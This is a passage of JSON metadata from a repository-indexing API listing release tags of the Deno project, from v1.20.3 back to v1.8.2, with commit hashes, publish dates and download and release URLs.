"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.